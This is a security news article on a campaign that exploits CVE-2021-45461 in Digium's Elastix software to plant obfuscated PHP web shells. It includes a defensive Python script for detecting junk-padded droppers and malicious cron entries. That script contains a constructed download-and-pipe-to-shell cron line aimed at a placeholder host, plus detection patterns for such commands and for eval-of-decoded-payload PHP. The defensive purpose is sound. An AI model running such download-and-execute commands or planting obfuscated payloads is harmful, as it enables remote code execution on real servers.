Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell. This web shell has been designed to exfiltrate data by downloading and executing additional payloads.
Unit 42 researchers at Palo Alto Networks spotted a campaign targeting the Elastix system used in Digium phones since December 2021.
The hackers exploited a vulnerability in the Rest Phone Apps (restapps) module, tracked as CVE-2021-45461, to implant a web shell on VoIP servers. The attackers used the web shell to exfiltrate data by dropping additional payloads inside the target’s Digium phone software.
The researchers reported that they witnessed a high volume of malicious traffic originating from more than 500,000 unique samples over the period from mid-December 2021 until the end of March 2022. The traffic targets Digium’s open source Asterisk communication software for VoIP phone devices.
The malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution and schedules recurring tasks to re-infect the host system. The malware also implants a random junk string to each malware download in an attempt to evade signature defenses based on indicators of compromise.
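The junk-string trick described above defeats defenses that match on file hashes, but not defenses that match on structure. The following Python script, added here as an illustration and not taken from the Unit 42 report or the malware itself, builds two constructed samples of an inert obfuscated-PHP pattern that differ only in an appended random comment, shows that a SHA-256 indicator matches only one of them, and then shows two checks that catch both: a content pattern for the eval-of-decoded-payload construct and a hash computed after stripping comments and whitespace. A small crontab check for download-and-execute entries, the re-infection mechanism mentioned above, is included as well. All sample inputs, hashes and regexes are constructed for this example.

```python
import hashlib
import random
import re
import string

# Constructed, inert stand-in for an obfuscated PHP dropper: the real campaign's
# web shell is not reproduced here, only the eval(decode(...)) shape a scanner keys on.
BASE_SAMPLE = b"<?php eval(gzinflate(base64_decode('PLACEHOLDER_PAYLOAD'))); ?>\n"


def append_junk(sample: bytes, length: int = 16, seed: int = 0) -> bytes:
    """Mimic per-download junk: append a random comment so every copy hashes differently."""
    rng = random.Random(seed)  # seeded so the example is reproducible
    junk = "".join(rng.choice(string.ascii_letters) for _ in range(length)).encode()
    return sample + b"/* " + junk + b" */\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_ioc_match(data: bytes, known_hashes: set) -> bool:
    """Plain hash-based IoC check: brittle against appended junk."""
    return sha256_hex(data) in known_hashes


# Structural check: eval() wrapped around a decode/decompress call, independent of trailing bytes.
OBFUSCATION_PATTERN = re.compile(
    rb"eval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\("
)


def pattern_match(data: bytes) -> bool:
    return OBFUSCATION_PATTERN.search(data) is not None


def normalize(data: bytes) -> bytes:
    """Strip PHP block comments and all whitespace so cosmetic padding does not change the hash."""
    data = re.sub(rb"/\*.*?\*/", b"", data, flags=re.S)
    return re.sub(rb"\s+", b"", data)


def normalized_hash_match(data: bytes, known_normalized_hashes: set) -> bool:
    return sha256_hex(normalize(data)) in known_normalized_hashes


# Re-infection check: cron entries that fetch something from the network and pipe it
# straight into an interpreter. The line below is a constructed example.
CRON_DOWNLOAD_EXEC = re.compile(
    rb"\b(curl|wget)\b.*\|\s*(sh|bash|php)\b|\bphp\s+-r\b"
)


def flag_cron_lines(crontab_text: bytes) -> list:
    """Return the crontab lines that download and execute content on a schedule."""
    return [
        line for line in crontab_text.splitlines()
        if line.strip() and not line.lstrip().startswith(b"#") and CRON_DOWNLOAD_EXEC.search(line)
    ]


if __name__ == "__main__":
    first = append_junk(BASE_SAMPLE, seed=1)
    second = append_junk(BASE_SAMPLE, seed=2)
    known = {sha256_hex(first)}
    print("hash IoC catches first copy:", hash_ioc_match(first, known))      # True
    print("hash IoC catches second copy:", hash_ioc_match(second, known))    # False
    print("pattern catches both:", pattern_match(first) and pattern_match(second))
    known_norm = {sha256_hex(normalize(first))}
    print("normalized hash catches second:", normalized_hash_match(second, known_norm))
    sample_cron = (
        b"# constructed crontab\n"
        b"0 * * * * /usr/bin/find /tmp -mtime +7 -delete\n"
        b"*/5 * * * * curl -s http://example.invalid/x | sh\n"
    )
    print("flagged cron lines:", flag_cron_lines(sample_cron))
```

Each check is cheap enough to run over a web root or a user's crontab from a host-based scanner or a log pipeline; the point of the normalized hash is that it restores hash-based matching once the variable padding has been removed, while the structural pattern works even when the padding is not in a comment.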
Reports stated that the intrusions are similar to the INJ3CTOR3 campaign that was disclosed by Check Point.
The researchers concluded that the strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors. It is a common approach malware authors take to launch exploits or run commands remotely.